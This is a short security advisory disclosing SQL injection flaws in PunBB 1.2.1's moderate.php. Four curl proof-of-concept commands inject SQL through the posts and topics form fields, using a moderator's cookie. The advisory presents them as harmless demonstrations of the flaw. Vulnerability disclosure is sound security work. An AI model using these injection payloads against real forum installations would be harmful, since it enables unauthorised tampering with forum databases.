==============================================
  SQL Injections in punbb-1.2.1 moderate.php
==============================================

 Description
 -----------

Improper handling of several arguments in
moderate.php allows a malicious moderator (or admin)
to inject arbitrary SQL statements.

This also affects systems using the magic_quotes_gpc
option in php.ini.

 Proof of concept
 ----------------

These examples will not do anything malicious or
even cause the system to report an error. Instead
they are crafted such that by simply adding a ;
or ' just before the comment "-- this won't show"
will cause the SQL query to crash demonstrating
the injection is possible.

Assumptions:
 - punbb_cookie contains identification of a
   moderator for forum with id 1.

Attacks delete posts:
curl --referer http://target/moderate.php --form posts="0) -- this won't show" --form delete_posts_comply=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1\&tid=1

Attacks move topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form move_to_forum=2 --form move_topics=1 --form move_topics_to=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1

Attacks delete topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show" --form delete_topics=1 --form delete_topics_comply=1 --cookie punbb_cookie=<valid cookie> target/moderate.php?fid=1

Attacks open/close:
 curl --referer http://target/moderate.php --form "topics[0) -- this won't show]"= --form open=1 --cookie "punbb_cookie=<valid cookie> target/moderate.php?fid=1